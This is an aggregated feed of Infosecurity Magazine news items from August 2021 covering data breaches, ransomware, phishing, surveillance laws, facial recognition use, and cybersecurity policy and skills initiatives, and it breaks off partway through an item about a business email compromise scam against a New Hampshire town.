Feed aggregator

Chinese Developer Exposes Data on Over One Million Gamers

Info Security - Fri, 08/27/2021 - 08:33
Chinese Developer Exposes Data on Over One Million Gamers

A Chinese game developer has unwittingly exposed the personal and device details of over a million players after leaving an internet-facing server unsecured, according to researchers.

A team at vpnMentor led by Noam Rotem and Ran Locar, discovered the unprotected Elasticsearch server on July 5. After no reply from its owner, EskyFun Entertainment Network Limited, they contacted the Hong Kong CERT, and the next day, July 28, the database was secured.

The 134GB trove contained an estimated 365 million records linked to players of the firm’s fantasy games: Rainbow Story: Fantasy MMORPG; Metamorph M; and Dynasty Heroes: Legends of Samkok.

This giant collection of user records is even more noteworthy given the firm collected only a rolling log of the previous seven days’ records, with anything older deleted to make way for fresh data.

“The reason for the sheer size of the data exposed appears to be EskyFun’s aggressive and deeply troubling tracking, analytics, and permissions settings,” vpnMentor claimed. “EskyFun gains access and control to almost every aspect of a person’s device and even their private networks. Most of [the data] is totally unnecessary for the games to function.”

Among the data leaked via the unsecured server were IP address, device model, phone number, geolocation and buyer account ID. The researchers also found over 217 million email addresses and plaintext EskyFun passwords.

The vpnMentor team estimated the number of users affected at over one million due to the number of Android downloads the three affected games have: around 1.5 million.

“Combining a user’s email address, gaming history, and support requests, hackers could send thousands of phishing emails posing as EskyFun’s support,” the researchers wrote.

“The database also contained plenty of data to build a profile of users and identify two vulnerable groups: high-paying accounts and children. By focusing on these users, hackers could reap huge financial rewards from a small group of victims.”

Cyber-criminals could also have used the plaintext passwords to hijack user’s EskyFun gaming accounts or to support credential stuffing campaigns designed to unlock other accounts across the web that the same credentials may protect.

Categories: Cyber Risk News

Federal Agencies Mostly Use Facial Recognition Tech for Digital Access

Info Security - Thu, 08/26/2021 - 20:35
Federal Agencies Mostly Use Facial Recognition Tech for Digital Access

The most popular uses for facial recognition technology (FRT) by federal agencies are cybersecurity and digital access, according to a new report by the United States Government Accountability Office.

The GAO surveyed 24 agencies about their FRT activities in the fiscal year 2020 and found 75% (18) use an FRT system for one or more purposes.

Sixteen agencies reported deploying the technology for digital access or cybersecurity purposes, with two of these agencies (General Services Administration and Social Security Administration) saying that they were testing FRT to verify the identities of people who were accessing government websites.

The report stated that 14 of these 16 agencies "authorized personnel to use FRT to unlock their agency-issued smartphones — the most common purpose of FRT reported."

Six agencies said that they had been using FRT to generate leads in criminal investigations; for example, to identify a person of interest by comparing their image against mugshots. 

"In some cases, agencies identify crime victims, such as exploited children, by using commercial systems that compare against publicly available images, such as from social media," stated the report.

Just over a quarter (27.5%) of agencies reported using FRT to monitor or surveil locations to control access to a building or facility or to detect the presence of an individual, such as someone on a watchlist.

More than half of the agencies (55%) reported FRT-related research and development that included examining the technology's ability to detect image manipulation and researching how accurately it could identify individuals wearing masks during the COVID-19 pandemic.

The Department of Justice reported conducting applied research on the capabilities and limitations of current synthetic face detection, such as deepfakes, and the relationship between skin tone and false match rates in facial recognition algorithms.

Plans to expand their use of FRT through to 2023 were reported by 10 of the 18 agencies, with one agency planning to pilot the use of FRT to automate identity verification processes for travelers at airports.

The US Treasury Inspector General for Tax Administration reported buying an FRT system that can identify facial images of criminal suspects. The system searches an online image cache that includes evidence from seized devices for potential matches of individuals linked to other investigations.

Categories: Cyber Risk News

Arizona Cops Arrest Fugitive in Police Data Bribery Case

Info Security - Thu, 08/26/2021 - 19:37
Arizona Cops Arrest Fugitive in Police Data Bribery Case

Police in Arizona have arrested a Tennessee man who went on the run after being indicted over a scheme to profit from confidential records belonging to the Memphis Police Department (MPD).

On Wednesday, US Marshal Tyreece Miller announced the arrest of Roderick Harvey for bribery of a public servant and violation of a computer act over $10,000.

The Tennessee Bureau of Investigation (TBI), working with the US Marshals Two Rivers Violent Fugitive Task Force, tracked Harvey to Phoenix, where he was detained without incident and booked into the Maricopa County Jail.

Miller said: “Despite Harvey’s attempt to evade arrest by traveling over a thousand miles, he was safely apprehended.”

Harvey was one of nine people indicted by a Shelby County Grand Jury on August 6 following a year-long investigation by the TBI that began in June 2020. 

The probe was requested by district attorney general Amy Weirich after former Shelby County assistant district attorney Glenda Adams was fired from her role and investigated after allegedly misusing confidential information.

Harvey's alleged co-conspirators include Adams, three former employees of MPD, and a personal injury attorney with Wells & Associates. The TBI investigation found that Adam, Harvey, Egypt Berry, Latausha Blair, Renatta Dillard, Marcus Lewis, Aaron Neglia, Martin Nolan, and Mustafa Sajid "were responsible for an elaborate scheme to profit from the use of confidential information in Memphis police reports.”

Case prosecutor Bryant Dunaway said the scheme involved buying information about traffic crashes from government employees before that information became public. 

He said: "It seems to be there's big business in personal injury attorneys and others to acquire information on crash victims, early, before it's available to the public. It's kind of a race to get there."

Adams, Berry, Lewis, Neglia, Nolan and Sajid are all accused of bribing a public servant. Adams, Berry, Blair, Dillard, Neglia and Nolan are accused of a violation of the computer act over $10,000. Adams, Berry and Nolan are accused of official misconduct. 

Berry and Dillard were in custody by August 6, and all the other defendants except Harvey made arrangements to turn themselves into law enforcement. 

The TBI said the investigation remains ongoing and “more indictments are expected.”

Categories: Cyber Risk News

Angry Birds Developer Accused of Illegal Data Collection

Info Security - Thu, 08/26/2021 - 18:30
Angry Birds Developer Accused of Illegal Data Collection

The attorney general of New Mexico has brought a lawsuit against a Finnish game developer over its treatment of children's data.

In the complaint, Hector Balderas accuses Rovio Entertainment of illegally collecting the data of children under the age of 13 who play the puzzle video game Angry Birds.

Rovio is further accused of sending the children's data to multiple third-party marketing companies that analyze, repackage, resell and otherwise use the information to sell targeted advertising to those children.

The suit states: "Rovio monetizes children by surreptitiously exfiltrating their personal information while they play the Angry Birds Gaming Apps and then using that personal information for commercial exploitation." 

Developers of child-directed games are required under the federal Children’s Online Privacy Protection Act (COPPA) to obtain parental consent before collecting any personal information from players. Creators whose games are targeted at a wide age range must still take action to ensure that data belonging to users under the age of 13 is not collected.

"The State’s complaint alleges that Rovio has deliberately attempted to turn a blind eye to its enormous child audience, while simultaneously marketing the Angry Birds games to kids through movies, lunch boxes, kids’ meals, and more," wrote the New Mexico attorney general's office in a statement released Wednesday.

New Mexico is seeking an injunction to prohibit Rovio's data collection practices. The state is also pursuing civil penalties and restitution from the Finnish game developer. 

“Parents must have the power to protect their children and determine who can have access to their child’s personal data, and New Mexican parents are being misled about what information is being collected from their children,” said Balderas. 

“This company must follow the law, and we will always hold companies accountable that risk the safety of children.”

Angry Birds is a simplistic game in which cartoon birds are launched from a giant slingshot to knock down structures erected by green cartoon pigs.

Since the game series was launched in 2009, its 35 spin-off games have been downloaded more than 4.5 billion times collectively, making Angry Birds the most downloaded freemium game series of all time.

Categories: Cyber Risk News

UK Cyber Security Council Opens Membership Application Process

Info Security - Thu, 08/26/2021 - 13:24
UK Cyber Security Council Opens Membership Application Process

The UK Cyber Security Council has today announced it has opened its membership application process.

The self-regulatory body for the cybersecurity education and skills sector, which launched as an independent entity earlier this year, is now inviting applications from eligible organizations throughout the UK. These are any organizations “with an interest in promoting, supporting and developing the cybersecurity profession.”

Those organizations whose membership applications are accepted will be allowed to nominate representatives to the Council’s committees, focusing on the core activities of professional standards, qualifications and careers, ethics and diversity.

Don MacIntyre, interim CEO for the UK Cyber Security Council, commented: “Professional standards, qualifications and careers, ethics and diversity are the stand-out issues facing the profession and its practitioners. Businesses with an interest in cyber security will never have a better opportunity to influence the direction and development of these and other issues than to join the Council and getting involved.”

The Council added that it would be putting in place engagement mechanisms to gather views from member organizations and use these insights to inform activities and decisions. MacIntyre said: “It is only through building an actively engaged community of members that the Council will be able to speak as the representative voice for the UK’s cyber security profession. With every new membership, our voice becomes clearer, louder and increasingly more difficult to be ignored.”

The UK government commissioned the UK Cyber Security Council in 2018 to promote and steward standards across the industry, and the overarching aim of helping close the UK’s cyber skills gap.

In June, the Council announced its first two initiatives as part of its remit to boost professional standards in the cyber industry. These were to determine the terms of two committees: a Professional Standards & Ethics Committee and a Qualifications & Careers Committee. These committees are tasked with helping ensure a common set of standards are adopted throughout education and training interventions related to cybersecurity. The Council also revealed it would be working on an initial mapping of CyBOK’s Qualifications Framework onto a public-facing Career Pathways Framework.

For more information on how to apply for membership to the Council, visit: https://www.ukcybersecuritycouncil.org.uk/membership/

Categories: Cyber Risk News

"Sophisticated" Cyber-Attack Compromises Patient Data at Private Health Clinic

Info Security - Thu, 08/26/2021 - 09:49
"Sophisticated" Cyber-Attack Compromises Patient Data at Private Health Clinic

Personal and clinical data of more than 73,000 patients have been affected by a “sophisticated ransomware cyber-attack” on a private medical clinic in Singapore.

In a press release, Eye & Retina Surgeons revealed the attack took place on 6 August, compromising sensitive data including patients’ names, addresses, ID card numbers, contact details and clinical information. However, no credit card or bank account details were accessed or compromised in the incident.

“Patients are now being progressively informed of this cyber-incident,” the release stated.

The clinic confirmed that the attack impacted servers and several computer terminals at its branch in Camden medical, although none of its other branches were unaffected. Thankfully, none of the eye specialist’s clinical operations were affected, and its IT systems are now securely restored.

The company noted it “maintains segregated networks and active medical records are maintained separately on a cloud-based system and thus were not accessed or compromised.”

The incident was reported to the Personal Data Protection Commission and the Singapore Computer Emergency Response Team (SingCERT), while the Eye & Retina Surgeons’ IT team is working with the Cybersecurity Agency of Singapore (CSA) and the Ministry of Health (MOH) to investigate the causes and perpetrators of the attack.

The clinic said there is no evidence that any compromised data has been published, but it will continue to monitor the situation. It added: “(Eye & Retina Surgeons) regrets this breach and wishes to assure its patients that it takes patient confidentiality very seriously.”

In a separate statement, Singapore’s MOH reassured citizens that the compromised systems are not connected to its own IT network, including the National Electronic Health Record, and “there have been no similar cyberattacks on MOH’s IT systems.”

It added: “Following this incident, MOH will be reminding all its licensed healthcare institutions to remain vigilant, strengthen their cybersecurity posture, and ensure the security and integrity of their IT assets, systems, and patient data. It is only through the disciplined maintenance of a safe and secure data and IT system that healthcare professionals will be able to deliver accurate and appropriate care and uphold patient safety.”

Commenting on the story, Jonathan Knudsen, senior security strategist at the Synopsys Software Integrity Group, said: “Every organization is a software organization, even an eye clinic. All organizations, no matter their size or industry, must include cybersecurity as part of their day-to-day operations. A comprehensive, proactive approach to security reduces risk for the organization and its customers.

“In the case of Eye & Retina Surgeons, segmenting the network between administrative functions and medical data was a smart defensive move and prevented this attack from being much worse. This technique is part of the basic security hygiene that all organizations should practice. Even with the best defenses, things can still go wrong. Incident planning helps the organization be prepared to remediate problems and notify customers and authorities.”

Categories: Cyber Risk News

Government Names Candidate for New Information Commissioner

Info Security - Thu, 08/26/2021 - 09:35
Government Names Candidate for New Information Commissioner

The UK government’s preferred candidate to be the next information commissioner will be John Edwards, who currently serves as New Zealand’s current privacy commissioner.

The information commissioner plays an increasingly important role in the UK’s regulatory landscape following the country’s departure from the EU.

The Information Commissioner’s Office (ICO) is an independent body that regulates the GDPR and its UK equivalent, the Data Protection Act 2018, as well as the Freedom of Information Act, the NIS Directive — transposed into UK law as the Network and Information Systems Regulation 2018 — and the Privacy and Electronic Communications Regulations (PECR), which govern nuisance calls and spam.

Edwards was appointed privacy commissioner in 2014 and is currently serving his second five-year term in New Zealand. He brings with him over two decades of regulatory and legal experience.

Edwards will now appear before MPs on the Digital, Culture, Media and Sport Select Committee for pre-appointment scrutiny on September 9.

He will arrive at a key moment for the UK as it seeks to strike multibillion-pound “data adequacy” agreements with the US, Australia and South Korea, and navigate a tricky relationship with the EU.

Although the bloc has adopted a data adequacy decision enabling the free flow of information to and from the continent, it may be challenged in court given concerns that the UK’s intelligence services could snoop on European citizens’ data.

“There is a great opportunity to build on the wonderful work already done and I look forward to the challenge of steering the organisation and the British economy into a position of international leadership in the safe and trusted use of data for the benefit of all,” said Edwards.

Current information commissioner Elizabeth Denham claimed her office had supported innovation while driving public trust in data use during the pandemic.

“Implementing any changes parliament decides on will fall to my successor, who will take on a role that has never been more important or more relevant to people’s lives,” she added.

“John Edwards would bring extraordinary breadth, international leadership and credibility to this role. He will receive the support of a modern, independent ICO that has the courage, resources and expertise to make a positive difference to people’s lives.”

Categories: Cyber Risk News

Record Summer for UK's Cyber Skills Courses

Info Security - Thu, 08/26/2021 - 09:13
Record Summer for UK's Cyber Skills Courses

Over 1850 teenagers signed up for a government-backed cybersecurity skills initiative this summer, a record number, according to the National Cyber Security Centre (NCSC).

The CyberFirst summer course is run by the GCHQ off-shoot and went online-only last year during the pandemic.

That saw record participation which has been surpassed again in 2021, the NCSC claimed. The number of applications this year was also record-breaking, increasing from 3,909 in 2020 to 4,384.

The course itself is open to 14 to 17-year-olds and covers topics such as digital forensics, ethical hacking and cryptography. Pupils now have the option of attending in person at a location in Warwickshire or completing it online.

This year, 43% of attendees were girls, and nearly half (47%) were pupils from ethnic minority backgrounds. Both groups are under-represented in the industry.

CyberFirst courses are intended to spur and nurture an interest in cybersecurity, which will ultimately help close major skills shortages and gaps in the sector.

According to the government, half (50%) of businesses have a basic skills gap — which means those in charge of cybersecurity don’t have the confidence to perform basic tasks. Meanwhile, the shortage of cyber professionals in the UK is estimated at over 27,000, according to the ISC2.

“It’s fantastic to see so many young people engaging with cyber security and developing the skills that will help them thrive in the industry,” said Chris Ensor, NCSC deputy director for cyber growth.

“Our summer courses provide fun, hands-on opportunities to learn about defending our digital world and we hope they will be inspired to pursue their interests further. The next generation of cyber experts must be diverse as well as skilled, and through CyberFirst we are committed to making the industry a more accessible and inclusive place for all.”

More than 55,000 students have taken part in CyberFirst courses and the Girls Competition since 2016.

Categories: Cyber Risk News

Tech Giants Pledge Billions to Biden's "Whole of Nation" Security Plan

Info Security - Thu, 08/26/2021 - 08:40
Tech Giants Pledge Billions to Biden's "Whole of Nation" Security Plan

Some of the world’s biggest tech companies have committed tens of billions of dollars to improving supply chain security, closing industry skills gaps and driving security awareness among the public, according to the White House.

As reported by Infosecurity yesterday, the Biden administration welcomed the CEOs of Microsoft, Apple, Google, IBM and others to a meeting yesterday to discuss the “whole-of-nation” effort needed to address cybersecurity threats.”

The result of that encounter has been a series of commitments from these firms, including $10bn from Google over the next five years to expand zero trust and improve supply chain and open source security. The tech giant will apparently also help 100,000 Americans earn “digital skills certificates.”

IBM said it would train 150,000 people in cyber skills over the coming three years and focus on improving the diversity of the security workforce, while Microsoft has committed $20bn over five years to drive security by design, and $150m for federal, local and state governments.

Apple will establish a new program to improve supply chain security, including among its 9000 US suppliers, with multi-factor authentication (MFA), vulnerability remediation, event logging and incident response all playing a key role.

Amazon is making MFA devices available to all AWS customers and rolling out the security training it offers employees to the general public.

Aside from these commitments, the White House announced the expansion of its Industrial Control Systems Cybersecurity Initiative, from the electricity sector to natural gas pipelines, and said the National Institute of Standards and Technology (NIST) would develop a new framework for supply chain security.

In another potentially significant move, insurer Resilience said it would require policyholders to meet a threshold of cybersecurity best practice as a condition of receiving coverage — something experts have been demanding for some time across the industry.

“I’m especially excited to see that Resilience is requiring minimum cybersecurity standards as a condition of coverage,” argued Jake Williams, co-founder and CTO at BreachQuest. “Many organizations view cyber-insurance as an alternative to implementing security controls rather than as a complement to those controls.”

There were also pledges from several education providers to help improve security awareness among the public and grow America’s cyber workforce. The White House claimed it currently has a skills shortage of nearly 500,000 professionals.

“We applaud Amazon’s commitment to make security awareness training available at no charge and to deliver multi-factor authentication (MFA) to all Amazon Web Services account holders. Such basic defenses should be in place everywhere,” argued Jack Kudale, founder and CEO of Cowbell Cyber.

“The security crisis is acute within the small and mid-size business segment. Incentives to drive change and adoption of fundamental cyber-hygiene practices including cybersecurity and cyber-insurance will change the balance of power between businesses and cyber-criminals.”

Categories: Cyber Risk News

Australia Passes Identify and Disrupt Bill

Info Security - Wed, 08/25/2021 - 20:42
Australia Passes Identify and Disrupt Bill

A coalition bill that grants the police more powers to spy on criminal suspects online has been passed by the Australian government.

The Surveillance Legislation Amendment (Identify and Disrupt) bill has created three new types of warrants that enable the Australian Federal Police (AFP) and Australian Criminal Intelligence Commission (ACIC) to modify and delete data belonging to cybercriminal suspects and take over their accounts. 

Using the new data disruption warrants, the AFP and the ACIC can prevent serious offenses from being committed online by modifying, adding, copying or deleting data. Network activity warrants allow the agencies to gather intelligence on criminal activity being carried out by cyber-criminal networks, while account takeover warrants can be used to take control of a suspect's online account.

An eligible judge or a nominated member of the administrative appeals tribunal (AAT) can issue the data disruption and network activity warrants. However, the account takeover warrants must come from a magistrate who is satisfied that there are reasonable grounds that such a step is required to collect evidence relating to a relevant offense.

On Tuesday, Labor MP Andrew Giles told the lower house that the bill had gained the support of the opposition because “the cyber-capabilities of criminal networks have expanded, and we know that they are using the dark web and anonymizing technology to facilitate serious crime, which is creating significant challenges for law enforcement.”

The Greens flagged that the new powers go against a central recommendation of the Richardson review of the legal framework for Australia's intelligence community. Richardson found that “law enforcement agencies should not be given specific cyber-disruption powers.”

Recommendations to improve safeguards and oversight concerning the new powers were made earlier this month by the parliamentary joint committee on intelligence and security (PJCIS), though not all of them were implemented.

The committee can review the bill after four years, and the Independent National Security Legislation Monitor will review the bill in 2024.

Kieran Pender, senior lawyer at the Human Rights Law Centre, told Guardian Australia that the new powers granted to the AFP and ACIC under the bill “are unprecedented and extraordinarily intrusive."

Categories: Cyber Risk News

Glitch Exposed Data of Alleged Treaty Violator to FBI

Info Security - Wed, 08/25/2021 - 19:55
Glitch Exposed Data of Alleged Treaty Violator to FBI

Private data belonging to an alleged treaty violator was accessible to unauthorized FBI agents for months because of a software program flaw.

The glitch in the Palantir program was reportedly exploited by at least four Bureau employees to view data belonging to Singapore resident and US citizen Virgil Griffith

Former Ethereum developer Griffith was arrested at Los Angeles International Airport in November 2019 and charged with violating the International Emergency Economic Powers Act by traveling to the Democratic People’s Republic of Korea to give a presentation and technical advice on using crypto-currency and blockchain technology to evade sanctions. 

In January 2020, in a Southern District of New York courthouse, Griffith pleaded not guilty to the charge.  

The Palantir defect exposed data that had been recovered from Griffith's Twitter and Facebook accounts in March 2020 during the execution of a federal search warrant. Prosecutors in the case against Griffith, who described the glitch in a letter, said it pertained to the program's default setting.

“When data is loaded onto the Platform, the default setting is to permit access to the data to other FBI personnel otherwise authorized to access the Platform,” wrote prosecutors. 

The prosecutors wrote that word of the unauthorized access came to Griffith's assigned FBI case agent via an email sent by another agent. The email explained that material seized in the search and entered in Palantir through the program's default settings had been accessed by FBI analyst.

A letter filed by the Bureau on Tuesday states: “An FBI analyst, in the course of conducting a separate investigation, had identified communications between the defendant and the subject of that other investigation by means of searches on the Platform that accessed the Search Warrant Returns.”

Prosecutors learned that three FBI analysts and an agent had viewed Griffith's private data owing to the Palantir glitch. None of the FBI employees who accessed Griffith's data were working on his case. 

Between May 2020 and August 2021, the seized material was accessed at least four times.

Griffith is scheduled to appear in court on September 21. 

Categories: Cyber Risk News

Revere Health Data Breach Impacts Cardiology Patients

Info Security - Wed, 08/25/2021 - 18:55
Revere Health Data Breach Impacts Cardiology Patients

The Personal Identifiable Information (PII) of approximately 12,000 cardiology patients has been exposed in a cyber-attack on a healthcare provider based in Utah.

Patient data in the care of Revere Health was compromised when the organization fell victim to a phishing attack on June 21, 2021.

An attacker impersonating the US Agency for International Development (USAID) sent an email to a Revere Health employee that contained a malicious link. When the employee clicked the link, they inadvertently gave the threat actor access to their login credentials. 

The attacker used the stolen credentials to log in to an employee email account that contained information belonging to patients of Revere Health’s Heart of Dixie Cardiology Department in St. George, Utah. No credit card or payment information was among the data accessed by the attacker.

In a patient notification statement, Revere Health said that the compromised data was limited to patient names, dates of birth, medical record numbers, provider names, procedures, and information about appointments. 

"Since this data is relatively limited, we believe that this poses a low-level risk to your personal information," said the organization.

It continued: "We have no reason to believe that they [the attacker] accessed, or were interested in, patient information. However, we cannot completely rule this out."

Revere Health said that active monitoring by its IT security team detected the unauthorized activity quickly. Within 45 minutes of the attack's commencing, the team was able to sever unauthorized access to the compromised email account. 

An investigation into the incident led Revere Health to conclude that stealing patient data was not the assailant's main intention. 

"From our detailed investigation of this incident, we believe that the intent of this attack was to harvest login credentials from individuals in our organization and not to gather patient information," stated the healthcare provider. 

"Our security logs suggest that the attacker had three objectives: (1) to spread phishing emails, (2) to gather active usernames and passwords and (3) to attempt financial fraud against Revere Health." 

Following the incident, Revere Health has updated its security awareness training, enhanced suspicious activity detection protocols, and accelerated its rollout of two-factor authentication software.

Categories: Cyber Risk News

70% of Cyber Pros Believe Cyber Insurance is Exacerbating Ransomware

Info Security - Wed, 08/25/2021 - 14:33
70% of Cyber Pros Believe Cyber Insurance is Exacerbating Ransomware

More than two-thirds (70%) of cybersecurity professionals believe that the issue of ransomware is being exacerbated by cyber-insurance payouts to victim organizations, according to a new study by cybersecurity firm Talion.

The survey of 200 UK cybersecurity professionals also unveiled some worrying findings about reporting ransomware attacks to law enforcement. When asked why so many attacks are not reported, nearly half (45%) of respondents said that they believe businesses think law enforcement slows down ransomware recovery and they are focused on getting their systems back online. More than a third (37%) said it was because companies have paid a ransom and don’t want to get into trouble.

Additionally, one in 10 of those surveyed said companies didn’t know how to report ransomware attacks to law enforcement.

The report follows a surge in ransomware attacks globally in 2021. Earlier this month, a study from the International Data Corporation (IDC) found that over one-third of organizations worldwide have experienced a ransomware attack or breach that blocked access to systems or data in the previous 12 months. This has led to numerous eye-watering ransoms being paid to cyber-criminals, ramping up the debate on whether it is ever acceptable to pay a ransomware demand.

Commenting on the study, Mike Brown, CEO of Talion, said: “Our study highlights that many organizations are concerned about reporting ransomware attacks to law enforcement out of fear it could have further negative repercussions. All victims want to get back to business as usual as quickly as possible; however, it can be a complicated landscape to navigate. Should you pay the ransom? If so, is it lawful? Organizations should be mindful that it is unlawful to make a payment to terrorist organizations or prescribed groups in breach of international sanctions. What is required is a clear legal framework that allows organizations to make the best, lawful decisions when they are in this high-stress situation. Law enforcement needs to find a way to work with a commercial organization so that they are viewed as a source of expertise and support, not a further obstacle to overcome.”

“In terms of insurance payouts, it is not surprising so many security professionals see them as fuelling the ransomware industry, as they certainly cushion the blow of attacks. However, payouts are not guaranteed, and insurers are getting stricter every day. The best option is, therefore, to prepare for attacks and rehearse your strategy so when your organization gets hit in real life, losses are kept to a minimum.”

In June, Talion launched the #RansomAware campaign, a coalition of cyber security experts, businesses, academia and government to facilitate collaboration and information sharing around ransomware.

Categories: Cyber Risk News

Innovative Recruitment Practices Can Close the Cyber Skills Gap

Info Security - Wed, 08/25/2021 - 12:58
Innovative Recruitment Practices Can Close the Cyber Skills Gap

Developing more innovative hiring practices is crucial to attracting more talent to the cybersecurity industry, according to panelists speaking during a recent RSA webcast.

The event was held amid growing efforts from the US federal government to attract new candidates to the cybersecurity industry to close the burgeoning skills gap.

Barbara Endicott-Popovsky, executive director of Center for Information Assurance and Cybersecurity and professor at the University of Washington, stated: “It’s been frustrating to watch the lack of awareness of the cyber threats that we face and even more frustrating to spend so much time as we have developing talent and trying to make sure we get the right people to the right places.”

The first step in addressing this issue is to ensure there is much more clarity about the types of people and skills that are needed to work in cyber, according to Lynn Clark, chief of the NSA/DHS Centers of Academic Excellence at the National Security Agency (NSA). “It’s really hard to produce educational programs to prepare people for the workforce if we don’t know what our end objective is,” she outlined.

It is also vital that cybersecurity recruiters recognize the wide variety of motivations candidates have to work in this sector, thereby ensuring they “use the right lure for the right fish,” said Joshua Corman, senior advisor for the Cybersecurity and Infrastructure Security Agency (CISA).

He listed five different drivers (p’s) for those who work in the industry: protectors, purpose, prestige, profit and protest/patriotism, adding that “how you engage and recruit them will be different.”

The discussion then turned to the types of people and skills needed to make up the industry. Endicott-Popovsky observed that traditionally, the cyber industry has primarily been comprised of ‘techies,’ meaning other important skill sets are lacking.

Emily Harding, deputy director and senior fellow with the International Security Program at the Center for Strategic and International Studies (CSIS), said that in her experience, character and mindset are more important than qualifications when looking to recruit candidates for cybersecurity jobs. She believes the ideal person needs to be “smart and can think, and who does not get discouraged by bureaucracy or small hurdles, somebody who doesn’t want a roadmap to accomplish things.”

As well as hackers who can use their technical skills to discover security flaws, Corman feels the cyber industry needs more ‘translators’ in its ranks to translate these flaws into action. During previous experiences, he found that people with backgrounds in areas like law and project management are particularly effective at this role. “The things we were able to do were because we came from incredibly different backgrounds, but we had a common cause, common purpose and could be brought together like a team of Avengers to fight the greatest foes and risks,” he added.

Clark concurred with these perspectives, emphasizing the need for security teams to be comprised of people with strong soft-skills, such as communication and collaboration, alongside “people who understand the technology.” She pointed out, “All the technology in the world is not going to protect us from the hacker who can socially engineer somebody into giving him a password or who can spearphish and get the important information they need to access our systems.”

The panel also agreed that the organizations need to adapt their standard requirements for cybersecurity candidates to enable this type of neurodiversity to become a reality. This includes working with HR and legal departments to reduce the emphasis on formal technical qualifications. Additionally, Harding believes “you have to have that human-to-human connection as much as possible, where you’re going out to career fairs and universities and recruiting.”

The principle of favoring character over qualifications is particularly pertinent when it comes to recruiting for leadership positions. Corman observed that individuals are often pushed into leadership roles based on their technical expertise, which is the wrong criteria to use. “You have to make sure you have the right leaders because they set the tone, the cadence, the value set, the culture, as best they can,” he noted.

More broadly, Corman said that all personnel operating in the rapidly evolving field of cybersecurity must be flexible and willing to learn on the job continuously. “An adaptable person will adapt at the speed of cyber,” he commented.

Categories: Cyber Risk News

Drug Dealers Get 27 Years After Police Crack EncroChat Comms

Info Security - Wed, 08/25/2021 - 09:23
Drug Dealers Get 27 Years After Police Crack EncroChat Comms

A drug dealer has been given a ten-year jail sentence after officers monitored his encrypted communications with other suppliers, according to the National Crime Agency (NCA).

Lee Broughton, 40 from Epsom, was sentenced last week at Kingston Crown Court after pleading guilty back in April to supplying cocaine.

His case was one of the many that the NCA is working on as part of Operation Venetic, after international law enforcers cracked a popular encrypted chat platform.

The agency revealed last year that it had been working on cracking EncroChat since 2015. The service is said to have had 60,000 users globally, 10,000 of whom were in the UK. It was reportedly used for trading drugs and other illegal goods, laundering money and planning hits on rivals.

The service offered users special devices, costing around €1000 each, and would charge €1500 for a six-month subscription offering worldwide coverage. Devices didn't require users to associate a SIM card with their account and used a dual operating system with an encrypted interface.

Law enforcers have already arrested over 700 individuals in the UK due to their success in infiltrating EncroChat.

Broughton used the username "Sleekyak" to communicate with 22 contacts via the service — boasting he could sell 10 to 20kg of cocaine per week. He was apparently linked to the EncroChat moniker after revealing in one conversation the date of his birthday.

In related news, Michael Devine, 45, from Pete Best Drive in Derby, was this week sentenced to 17 years behind bars after using EncroChat to discuss sailing hundreds of kilograms of cocaine across the Atlantic.

According to reports, police were able to unmask Devine as the individual behind the "lawfularbor" and "mixedtree" accounts thanks to his references to family members, his poker playing, his car and Costco membership.

Police have scored several wins with other encrypted chat services used by criminals. They took down Sky ECC in March 2021 and, more recently, disrupted the notorious Anom service.

Categories: Cyber Risk News

Cybercrime Losses Triple to £1.3bn in 1H 2021

Info Security - Wed, 08/25/2021 - 08:57
Cybercrime Losses Triple to £1.3bn in 1H 2021

Individuals and organizations lost three times more money to cybercrime and fraud in the first half of the year compared to the same period in 2020, as incidents soared, according to new figures.

The data comes from the National Fraud Intelligence Bureau (NFIB), which collects reports of cybercrime and fraud from Action Fraud, the UK’s national reporting center for such crimes.

It revealed that between January 1 and July 31 2020, victims lost £414.7m to cybercrime and fraud. However, the figure surged to £1.3bn for the same period in 2021.

This can be partly explained by the huge increase in cases from last year to this. In the first half of 2020, there were just 39,160 reported to Action Fraud, versus 289,437 in the first six months of 2021.

In both periods, individuals comprised the vast majority of cases and the majority of losses. However, organizations lost 6.6 times more money in the first half of 2021 compared to 1H 2020, while individual victims lost 2.6 times more during the period.

Experts urged the government to do more to educate individuals about the dangers of phishing and the importance of cybersecurity best practices and argued that organizations should be more proactive in mitigating home working risks.

“The pandemic has opened up many opportunities for malicious hackers to intercept individuals, remote workers and businesses as we have been thrown out of our usual routines and away from the safety of corporate firewalls. For many businesses, the rush to move their products and services online, or into the cloud, has left the door open as cybersecurity took a back seat to business continuity,” explained Outpost24 CSO, Martin Jartelius.

“Across the country, millions of people have switched to work from home and remain digital-only for the past 18 months. This gives hackers the time to test out different attack techniques, learn what works — sometimes from other hacking groups — and evolve their tactics to achieve maximum return.”

Categories: Cyber Risk News

Tech CEOs to Discuss Cybersecurity with Biden Today

Info Security - Wed, 08/25/2021 - 08:37
Tech CEOs to Discuss Cybersecurity with Biden Today

The CEOs of some of the world’s biggest tech companies are set to meet President Biden today to discuss how their products can improve the security of America’s businesses and critical infrastructure providers, according to a report.

Apple boss Tim Cook, Amazon CEO Andy Jassy and Microsoft supremo Satya Nadella are attending the meeting. At the same time, the CEOs of Google, IBM, JP Morgan Chase and utility firm Southern Co have also been invited, according to Bloomberg.

A senior official familiar with the event told the news site that part of the discussion would be focused on how software can enhance supply chain security.

It’s thought that critical infrastructure could also be a focus — particularly in light of the Colonial Pipeline ransomware attack in May, which led to surging fuel prices for days up and down the US East Coast.

Digital supply chain attacks are also increasingly commonplace, with the SolarWinds campaign highlighting the lengths state-backed threat actors are prepared to go to infiltrate US government organizations. Microsoft claimed shortly after that over 1000 Kremlin operatives had worked on the campaign.

The line between state-sponsored and financially motivated cybercrime attacks has become increasingly blurred over recent months. The Kaseya ransomware campaign appeared inspired in some part by SolarWinds, targeting an IT management software provider to hit thousands of downstream customers.

The Biden administration appears more determined to tackle these challenges than its predecessor, although, to an extent, they have become more acute over the past few months.

The President himself warned last month that if a “real shooting war” broke out with a major power, it could result from a significant cyber incident.

That follows tense negotiations with the Kremlin over Russia’s apparent harboring of cybercrime groups like those that hit Colonial Pipeline, Kaseya and meat processing giant JBS USA.

He is reported to have told President Putin that critical infrastructure providers should be considered off-limits.

Categories: Cyber Risk News

Cyber-thieves Scam New Hampshire Town Out of $2.3m

Info Security - Tue, 08/24/2021 - 20:14
Cyber-thieves Scam New Hampshire Town Out of $2.3m

A New Hampshire town is reeling from the "very shocking" cybercrime that claimed more than 14% of its annual budget.

Peterborough is a 7,000-person town with a budget for the fiscal year of just over $15.8m. Cyber-thieves conned the town out of $2.3m through two business email compromise (BEC) scams. 

